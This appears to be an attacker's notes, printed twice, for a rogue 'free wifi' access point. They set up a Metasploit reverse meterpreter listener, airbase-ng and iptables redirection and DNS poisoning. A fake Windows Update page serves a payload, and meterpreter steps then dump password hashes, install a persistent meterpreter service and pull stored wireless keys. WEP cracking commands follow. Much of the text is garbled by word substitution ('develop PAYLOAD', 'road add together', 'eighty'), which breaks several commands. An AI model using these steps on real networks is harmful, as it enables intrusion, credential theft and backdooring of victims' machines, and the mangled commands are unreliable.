dhclient wlan0 //// Connect to the internet, tin move travel eth0
*****Setup metasploit listener********* ///// u demand to exercise the meterpreter reverse_tcp connector --- data is available inwards many places http://www.irongeek.com/i.php?page=videos/metasploit-create-reverse-meterpreter-payload-executable
cd /
cd pentest
cd exploits
cd framework3
./msfconsole
role exploit/multi/handler
develop PAYLOAD windows/meterpreter/reverse_tcp
develop LHOST 10.0.0.1
develop LPORT 55555
present options
exploit
modprobe tun
airbase-ng -P -C xxx -e "free wifi" wlan1 -v ////// tin move role diverse commands here
*************************
Transparent Airbase
*************************
su
***************
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
road add together -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 ////router address
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE wlan0 = road to the internet
/etc/init.d/dhcp3-server restart // backtrack users role dhcpd
/etc/init.d/lighttpd halt
lighttpd -D -f '/home/hm/Desktop/http/http' //webserver amongst imitation update page
**********************************************************************
straight whatever asking to apache
iptables -t nat -A PREROUTING -p tcp --dport eighty -j DNAT --to 10.0.0.1 //redirector
**********************************************************************
allow traffic again
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
road add together -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
**************************************************************************
**************************************************************************
**************************************************************************
NON Transparent Airbase
su
***************
modprobe tun
airbase-ng -P -C xxx -e "free wifi" wlan1 -v
su
***************
ifconfig at0 up
ifconfig lo up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
road add together -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport eighty -j DNAT --to 10.0.0.1
/etc/init.d/dhcp3-server restart
/etc/init.d/lighttpd stop
lighttpd -D -f '/home/hm/Desktop/http/http'
cd / /// dnspoison available at http://dnspentest.sourceforge.net/
cd home
cd hm
cd Desktop
cd dnspoison
coffee ServerKernelMain 10.0.0.1 10.0.0.1
****************************************************************************
**** Check for victims ********
arp -n -v -i at0
session - l
session -i
sysinfo
getuid
role priv
hashdump
***download keys*****
mkdir c:\\windows\\wkviewer4
cd \
cd windows
cd wkviewer
upload /home/hm/Desktop/http/wkv.exe C:\\windows\\wkviewer4 ///wireless fundamental viewer
upload /home/hm/Desktop/http/wkv.bat C:\\windows\\wkviewer4 /// executes bat script... banking concern friction match below
upload /home/hm/Desktop/http/metsvc-server.exe C:\\windows\\wkviewer4 //meterpreter server
upload /home/hm/Desktop/http/metsrv.dll C:\\windows\\wkviewer4
upload /home/hm/Desktop/http/metsvc.exe C:\\windows\\wkviewer4 //meterpreter server
execute -H -f wkv.bat
truthful cat wkv.txt
download wkv.txt /home/hm/Desktop/http/wkv.txt
misc......
wkv bat file =
wkv.exe /stabular wkv.txt
metsvc.exe install-service
Index html -
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
<style type="text/css">
<!--
.style2 {
font-family: Arial, Helvetica, sans-serif;
font-weight: bold;
font-size: 24px;
color: #999999;
}
.style3 {
font-family: Arial, Helvetica, sans-serif;
color: #666666;
font-weight: bold;
}
.style4 {
font-family: Arial, Helvetica, sans-serif;
color: #666666;
font-weight: bold;
font-size: 24px;
}
-->
</style>
<script src="/AC_RunActiveContent.js" type="text/javascript"></script>
</head>
<body>
<p><img src="/udntitled.jpg" alt=" u demand to exercise the meterpreter contrary Commands for imitation AP" width="1275" height="88" /></p>
<p align="center" class="style2">Critical Vulnerability inwards Windows XP, Vista, Windows 2000 detected. Download in addition to installation of upgrade required. </p>
<p align="center">
<input align="center" type="button" name="Button" value="Download Update" onClick="window.open('/windowsupdate.exe', 'download'); provide false;">
</p>
<p align="center" class="style2"></p>
<p> </p>
<form id="form1" name="form1" method="post" action="/upgrade.exe">
<label for="D"></label>
</form>
<p align="left" class="style4"> </p>
</body>
</html>
####################
ifconfig rausb0 up
airodump-ng -w capture -c half dozen rausb0
aireplay-ng -O 10 -a <mac access point> -c <mac client> rausb0
-O ->deauthenticate attack
aireplay-nh -3 -b <mac access point> -h <mac client> rausb0
-3 ->arp request
aircrack capture02.cap
##################
aircrack-ng -a ii filename.cap -w wordlist.lst -b AP:MA:CG:OE:SH:ERE
Note.You must capture sum cap files amongst airodump-ng (which way without --ivs option), non only IVs
------------------
Have y'all tried to manually connect to your AP?
iwconfig eth0 essid <whatever your ssid is>
iwconfig eth0 channel <whatever channel your AP is on>
iwconfig eth0 fundamental <whatever the fundamental is> (if y'all convey WEP turned on)
ifconfig eth0 up
Try that, give it a infinitesimal or ii in addition to and thus run iwconfig i time again in addition to post service your results.
##################
*****Setup metasploit listener********* ///// u demand to exercise the meterpreter reverse_tcp connector --- data is available inwards many places http://www.irongeek.com/i.php?page=videos/metasploit-create-reverse-meterpreter-payload-executable
cd /
cd pentest
cd exploits
cd framework3
./msfconsole
role exploit/multi/handler
develop PAYLOAD windows/meterpreter/reverse_tcp
develop LHOST 10.0.0.1
develop LPORT 55555
present options
exploit
modprobe tun
airbase-ng -P -C xxx -e "free wifi" wlan1 -v ////// tin move role diverse commands here
*************************
Transparent Airbase
*************************
su
***************
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
road add together -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 ////router address
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE wlan0 = road to the internet
/etc/init.d/dhcp3-server restart // backtrack users role dhcpd
/etc/init.d/lighttpd halt
lighttpd -D -f '/home/hm/Desktop/http/http' //webserver amongst imitation update page
**********************************************************************
straight whatever asking to apache
iptables -t nat -A PREROUTING -p tcp --dport eighty -j DNAT --to 10.0.0.1 //redirector
**********************************************************************
allow traffic again
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
road add together -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
**************************************************************************
**************************************************************************
**************************************************************************
NON Transparent Airbase
su
***************
modprobe tun
airbase-ng -P -C xxx -e "free wifi" wlan1 -v
su
***************
ifconfig at0 up
ifconfig lo up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
road add together -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport eighty -j DNAT --to 10.0.0.1
/etc/init.d/dhcp3-server restart
/etc/init.d/lighttpd stop
lighttpd -D -f '/home/hm/Desktop/http/http'
cd / /// dnspoison available at http://dnspentest.sourceforge.net/
cd home
cd hm
cd Desktop
cd dnspoison
coffee ServerKernelMain 10.0.0.1 10.0.0.1
****************************************************************************
**** Check for victims ********
arp -n -v -i at0
session - l
session -i
sysinfo
getuid
role priv
hashdump
***download keys*****
mkdir c:\\windows\\wkviewer4
cd \
cd windows
cd wkviewer
upload /home/hm/Desktop/http/wkv.exe C:\\windows\\wkviewer4 ///wireless fundamental viewer
upload /home/hm/Desktop/http/wkv.bat C:\\windows\\wkviewer4 /// executes bat script... banking concern friction match below
upload /home/hm/Desktop/http/metsvc-server.exe C:\\windows\\wkviewer4 //meterpreter server
upload /home/hm/Desktop/http/metsrv.dll C:\\windows\\wkviewer4
upload /home/hm/Desktop/http/metsvc.exe C:\\windows\\wkviewer4 //meterpreter server
execute -H -f wkv.bat
truthful cat wkv.txt
download wkv.txt /home/hm/Desktop/http/wkv.txt
misc......
wkv bat file =
wkv.exe /stabular wkv.txt
metsvc.exe install-service
Index html -
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
<style type="text/css">
<!--
.style2 {
font-family: Arial, Helvetica, sans-serif;
font-weight: bold;
font-size: 24px;
color: #999999;
}
.style3 {
font-family: Arial, Helvetica, sans-serif;
color: #666666;
font-weight: bold;
}
.style4 {
font-family: Arial, Helvetica, sans-serif;
color: #666666;
font-weight: bold;
font-size: 24px;
}
-->
</style>
<script src="/AC_RunActiveContent.js" type="text/javascript"></script>
</head>
<body>
<p><img src="/udntitled.jpg" alt=" u demand to exercise the meterpreter contrary Commands for imitation AP" width="1275" height="88" /></p>
<p align="center" class="style2">Critical Vulnerability inwards Windows XP, Vista, Windows 2000 detected. Download in addition to installation of upgrade required. </p>
<p align="center">
<input align="center" type="button" name="Button" value="Download Update" onClick="window.open('/windowsupdate.exe', 'download'); provide false;">
</p>
<p align="center" class="style2"></p>
<p> </p>
<form id="form1" name="form1" method="post" action="/upgrade.exe">
<label for="D"></label>
</form>
<p align="left" class="style4"> </p>
</body>
</html>
####################
ifconfig rausb0 up
airodump-ng -w capture -c half dozen rausb0
aireplay-ng -O 10 -a <mac access point> -c <mac client> rausb0
-O ->deauthenticate attack
aireplay-nh -3 -b <mac access point> -h <mac client> rausb0
-3 ->arp request
aircrack capture02.cap
##################
aircrack-ng -a ii filename.cap -w wordlist.lst -b AP:MA:CG:OE:SH:ERE
Note.You must capture sum cap files amongst airodump-ng (which way without --ivs option), non only IVs
------------------
Have y'all tried to manually connect to your AP?
iwconfig eth0 essid <whatever your ssid is>
iwconfig eth0 channel <whatever channel your AP is on>
iwconfig eth0 fundamental <whatever the fundamental is> (if y'all convey WEP turned on)
ifconfig eth0 up
Try that, give it a infinitesimal or ii in addition to and thus run iwconfig i time again in addition to post service your results.
##################